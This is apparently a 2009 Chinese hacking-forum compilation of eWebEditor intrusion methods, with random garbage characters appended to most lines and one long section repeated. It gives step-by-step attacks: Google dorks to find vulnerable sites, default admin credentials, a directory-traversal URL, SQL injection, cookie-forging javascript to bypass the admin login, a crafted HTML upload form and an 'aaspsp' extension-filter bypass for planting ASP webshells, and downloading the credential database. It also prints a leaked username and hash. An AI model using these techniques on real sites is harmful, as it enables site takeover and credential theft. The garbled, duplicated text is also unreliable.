eWebEditor.asp?id=45&style=standard1 样式调用
. E0 p8 k7 e/ X4 T$ I$ _. R" v7 O a- B6 z
& B$ V v% _ C e7 [) O% J
/edit/admin_uploadfile.asp?id=14&dir=../../..
1 l! B. S" D+ a3 M1 b- p! O9 K4 v可以浏览网站目录 ../自己加或者减
2 X l: a9 P- U7 O2 U- W
8 R; B7 S7 S6 u* d有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞- L3 W1 k ~1 C$ P) d; k7 u
简单利用就是5 P# V$ q% V5 v" ~0 a6 i
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200" o! ]) k. p6 g$ u
http://www.siqinci.com/ewebedito ... amp;style=full_v2007 I) S: |; O0 x M' a. H5 c! J& g
可以利用nbsi进行猜解,对此进行注入
& J* B0 q5 h6 a2 b还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
5 f+ k/ m# r& C- f1 d这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
- g% B- B: q o7 @: ]在action下面, H5 u# z( X% O* F4 R+ k& Z8 C1 h
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">
3 y; G0 V) h' S# F0 m& A' s5 ^* I<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
' y: n" a- h# Q$ f# N4 B, d<input type="submit" name="uploadfile" value="提交">' T3 D* h& i6 Y/ s; f
<input type=hidden name=originalfile value="">
" }8 p6 m2 ?, A; f3 E5 J) b# b</form>4 ^8 q# Z1 z0 R
------------------------------------------------------------------------------------------------------------------------------------------------
8 R/ @+ ?# s& }/ E" R6 d* s<input type="submit" name="uploadfile" value="提交"> 放在action后头
6 X7 }$ w9 d" W# s" j* D,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
! x0 k' h& i Q* `1 j" F
. O) N4 [) s \6 @. Y; u8 J, ?4 M9 N1 |: b* _- m
' H' I* C8 B. o3 i( n
! g; x D0 a: r% x: @5 Z
Ewebeditor最新漏洞及漏洞大全[收集] (图)
- C ?4 ^$ f o本帖最后由 administrator 于 2009-7-7 21:24 编辑( y" p' }+ i u3 K2 T# T
" R9 [# X# h h( i. `
以下文章收集转载于网络' I c! O2 p0 Z1 i: U/ W" Y
#主题描述# ewebeditor 3.8漏洞[php]
; m/ q+ @2 S/ }--------------------------------------------------------------------------------------------
& f1 d5 F4 S, ?' }#内容#
/ S+ t3 ]+ m" x3 |! m |# |php版ewebeditor 3.8的漏洞* d' v& j* ~+ k j- S+ @
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:1 J$ K: Y$ i! M" i
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
5 b) S1 L+ f! w8 A: k9 u4 a2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
3 \; i6 @! [2 h# o' d; t3 后面的利用和asp一样,新增样式修改上传,就ok了
2 @2 A2 T3 j( D测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)/ P; Q6 F y6 A g: n8 j* C
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
5 S4 x% D! Q/ J! J% U5 @& k: Ojsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了2 [4 ~- t, G3 \. b
--------------------------------------------------------------------------------------------
2 F* ~% l6 }1 }' z2 K$ v: }
$ ^ j" L7 |( u( m. g% e! _$ a8 b
算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
$ W8 w% G& n, H( @! N
+ ^! H& ~" g' F# G! v) u7 L1 U漏洞更新日期TM: 2009 2 9日 转自zake’S Blog
1 e+ Y& P/ z$ a' h- e2 m7 {) _4 b ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
) T: g' D: T; a+ E那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址: W) |0 B9 J7 o6 c+ o) d
& }$ N& ?- x; |2 a; g. w( O
- E, |% v+ r1 [; y* X( [! l
然后确定以后,这里是最关键的一部!
8 {0 [+ L7 j. k) {; Y9 M" W这里点了远程上传以后,再提交得到木马地址3 h3 U* g q5 l7 w. C" u
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限
' }3 g$ p9 V9 r7 y8 F; q属于安全检测漏洞版本ewebeditor v6.0.0/ @5 @7 `/ e/ b3 V
- I: I- R e* r% \ ]1 l
以前的ewebeditor漏洞:
$ I: w- a$ h- r5 |2 F0 ?6 V. ?; P
ewebeditor注入漏洞/ I# j$ z' r, K: i/ W' h; z
. n0 U: [$ W. i$ y+ `. c6 @大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb
. |1 D: ~$ l& `$ a, g默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话" F& `3 `1 f& R, x8 {
今天我给大家带来的也是ewebeditor编辑器的入侵方法
) n q& L- P( t1 u8 g不过一种是注入,一种是利用upload.asp文件,本地构造
5 t h; S5 Q1 i& x1 YNO1:注入
' q' c% a H# R/ Q% u. ]& |4 dhttp://www.XXX.com/ewebeditor200 ... amp;style=full_v200
# K1 t) \ R- p# f R编辑器ewebedior7以前版本通通存在注入- A1 y8 h1 S2 J9 c! v# R
直接检测不行的,要写入特征字符
8 f* _) p! r: H5 Z+ @0 `" z4 N我们的工具是不知道ewebeditor的表名的还有列名
3 S" S) q' U" d6 ]7 v2 u我们自己去看看
* Q/ j O0 u8 D Q, W哎。。先表吧/ G3 K: G' X; ]+ I
要先添加进库' B6 d& P, a2 w5 u0 h; N+ S' e
开始猜账号密码了
$ P# _5 G1 I' C4 V8 @我们==
. e* [/ Y7 m) x9 ]" e2 O% D心急的往后拉
2 t/ B3 H% @' f2 r* Z出来了
+ w G# F' s$ [% g2 H( A9 k. c1 q+ B[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 8511204 X2 _4 u' Z0 E- g
对吧^_^3 i% x- }) w" m V: m
后面不说了+ m3 Z$ E* n6 b5 |+ _
NO2:利用upload.asp文件,本地构造上传shell
$ c+ t( z1 S/ d6 D大家看这里. _% X. k# I4 n1 j o$ O
http://www.siqinci.com/ewebedito ... lepreview&id=37% m, s# O/ ?* ]( G
如果遇见这样的情况又无法添加工具栏是不是很郁闷
1 W0 d! a$ r, f$ K7 g0 w: X! I现在不郁闷了,^_^源源不一般8 w6 F) y) D3 f) p7 Q8 b5 @
我们记录下他的样式名“aaa”
, N) g) l7 x. A我已经吧upload.asp文件拿出来了
* v3 w6 n# R- M" x4 ~4 }我们构造下
, l! _# O& |4 c/ q* ?" oOK,我之前已经构造好了: o2 P! o7 r8 X7 G/ A! ^, R
其实就是这里
6 s' q+ a: J7 t" [0 B% m<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>
0 h( D' l8 j5 Y3 ?! X<input type=file name=uploadfile size=1 style=”width:100%”>
5 i+ _3 W- o) G! \8 K, Z<input type=submit value=”上传了”></input>) R3 O* n I \. G) z
</form>* N7 T$ K }$ l
下面我们运行他上传个大马算了
8 [; H/ {: t ?5 S0 h ^, m# hUploadFile上传进去的在这个目录下
: @# b! T: T* }2008102018020762.asa
# [4 h) n& g7 ^7 A0 L) i1 t: D/ p0 \4 T* z' _4 y# X9 ~5 |' ^
过往漏洞:
- i- O' k8 M/ N' _. o3 | R. G4 G/ d7 q( O/ y
首先介绍编辑器的一些默认特征:
0 z) L+ L. s! |- j; [默认登陆admin_login.asp
" \- O0 @1 L' K4 K- g& \- B$ B" C默认数据库db/ewebeditor.mdb
+ Z. x. y7 l- B$ h# w- Y/ X默认帐号admin 密码admin或admin888
( q$ q6 n5 ^5 C4 z搜索关键字:”inurl:ewebeditor” 关键字十分重要
3 A- w8 k( M5 F ?3 a有人搜索”eWebEditor - eWebSoft在线编辑器”: v) a" c+ |# B5 C4 c4 c
根本搜索不到几个~. [1 Z2 K* h% x4 o, S
baidu.google搜索inurl:ewebeditor" \! G. n0 ?) @9 _5 B) v% T4 \
几万的站起码有几千个是具有默认特征的~
# B9 T! U: t9 O5 r( i& Y/ A4 c那么试一下默认后台
, C1 w% S g1 M1 `/ n# q2 Hhttp://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
# M6 W) {: D: q$ |: l7 n1 F/ y; ?5 n试默认帐号密码登陆。( f5 w8 l' U+ p* s% a
利用eWebEditor获得WebShell的步骤大致如下:" H9 e& O9 D& ^
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。, ?" }7 |3 U3 x5 A. h1 _+ J, B
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。1 F* ^( {, X4 y7 N) K8 r( x4 b
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
) @' I( ]& @% {6 u如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
% @) |- |+ a7 A m. c4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
% K0 \* I- w5 Y5 @; r然后在上传的文件类型中增加“asa”类型。
7 H, I# }3 f# H ^% [9 k' |1 z5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。: l3 N1 y% O( P5 h
漏洞原理2 }7 e) S. t$ {- H& Q" k
漏洞的利用原理很简单,请看Upload.asp文件:
1 m- X% M- u8 Z# k2 u) o# u任何情况下都不允许上传asp脚本文件
$ Y3 }" M9 i' V# { |sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
& U& R$ l0 N* k因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
8 d( W, J) @7 _6 Q3 b高级应用1 S7 c/ i2 J: W# ~& G1 d
eWebEditor的漏洞利用还有一些技巧:
; d0 F/ r( ]! I7 R4 i3 n1.使用默认用户名和密码无法登录。
, r# m5 \+ X; x$ t& N7 o8 m" s请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。' m/ T5 v8 | c
2.加了asa类型后发现还是无法上传。5 [ E, f1 w0 S1 H2 _5 r
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
. s7 f$ }' d/ @9 LsAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”) x: ~6 v" U1 b8 _2 a# m* i
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。# G. M; _, }$ V q. L$ k& D
3.上传了asp文件后,却发现该目录没有运行脚本的权限。3 J# [1 Z% M1 o/ \; }
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。0 u5 r- Y) {7 T A( H' g9 p* k2 \
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
6 A5 v7 l( Y _. N6 u& o看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
" e) \0 J) H5 P. i5 X后记/ D6 \5 r* N$ G) J
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!: v( O; ]( t1 {. z0 D: f {, T
基本入侵基础漏洞' N. n1 |* ?9 K" ^
eWebEditor 漏洞5 R6 L4 x. |! i$ s. r7 x
# N: F+ R9 Z- e. Z7 v" K( {9 [: e9 ?
各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!
" K8 J# q; I: m" {% L7 Z' v
5 w0 J% D/ t* r0 H漏洞利用
], F7 F8 d( p s% X利用eWebEditor获得WebShell的步骤大致如下:
/ c. K7 M2 X0 n/ N1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。& M) p1 i# x- M. H
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。$ g6 s7 R9 L" N3 W7 n5 s
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。! B4 V) T6 t: G& g. x
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
# {* v+ ~8 @/ Z. H8 [4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
I2 K, V& U+ C, {
& ~7 t( V+ R! j& G d然后在上传的文件类型中增加“asa”类型。
1 Q. o# P" V9 @
% }( k0 J* E2 a: H3 Q6 V0 X" v2 k7 |5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。! a. n5 T9 }! O+ a
: X# h# ]# r$ \' Z
: }( g2 G7 V2 T; o6 k% |
漏洞原理) u8 G( l0 v. ]2 o5 \8 O2 |
漏洞的利用原理很简单,请看Upload.asp文件:
# p& n8 x" A& s任何情况下都不允许上传asp脚本文件' h$ h! D X3 q/ b
sAllowExt = replace(UCase(sAllowExt), "ASP", "") t3 P J/ I" P* E
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!5 Y( B# F* ]: T$ l- y' Z$ T
& N( S7 U! L7 G- j: B5 j高级应用/ ]2 a" P+ R! \& K5 l$ F
eWebEditor的漏洞利用还有一些技巧:
& z, e2 E2 X) W. l, w9 L1.使用默认用户名和密码无法登录。6 w( V- _# T2 P; n i7 c
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。' V' P6 |+ L2 J6 @: n6 S8 X$ t a
2.加了asa类型后发现还是无法上传。
2 c' Q+ W: l+ i% b8 \应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
' S$ f6 H$ \9 X5 Y7 C$ |- B2 LsAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")0 Z3 M5 b: m. @0 G X
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。5 k# Q/ P0 m1 u! M
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
4 t4 I1 q ~' q呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
) f6 U( C( C: B T) p1 ?4.已经使用了第2点中的方法,但是asp类型还是无法上传。. u" ]0 w& @$ Y) }" z: N# c
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
$ C9 Z- M5 }. k K, } a( F
% B0 P* d2 E# \0 S3 _0 B. W3 T后记
% R6 d5 a6 }& f" ^) A根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |